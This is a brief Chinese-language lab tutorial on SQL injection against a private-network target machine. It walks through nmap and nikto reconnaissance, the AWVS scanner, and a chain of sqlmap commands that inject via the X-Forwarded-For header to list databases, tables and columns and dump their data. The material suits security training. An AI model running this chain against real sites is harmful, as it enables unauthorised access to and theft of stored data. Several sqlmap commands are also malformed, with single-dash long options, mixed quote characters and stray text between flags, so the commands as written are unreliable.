SQl注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQl语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
任何一个用户可以输入的位置都可能是注入点,比如url中,以及http报文中。
攻击机kail linux:192.168.1.104
靶场机器:192.168.1.105
目的:挖掘web漏洞,登录系统
扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 -A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
漏洞扫描器 AVWS
功能强大专注于web安全的漏洞扫描器。
针对web进行漏洞扫描
对扫描的结果进行分析,注意:如果具有SQL注入漏洞,可以直接利用,SQl注入漏洞为高危漏洞,可以直接获取服务器的权限。
使用sqlmap利用SQL注入漏洞
– sqlmap -u url -dbs 查看数据库名 --batch
– sqlmap -u url -headers=“X-Forwarded-For:" -D “数据库名” -table 查看对应数据库中的数据表 --batch
– sqlmap -u url -headers="X-Forwarded-For:” -D “数据库名” -T “表名” -columns 查看对应字段 --batch
– sqlmap -u url -headers=“X-Forwarded-For:*” -D “数据库名” -T “表名” -C “列名” -dump --batch
只要是用户可以输入的位置都是有可能存在注入点的!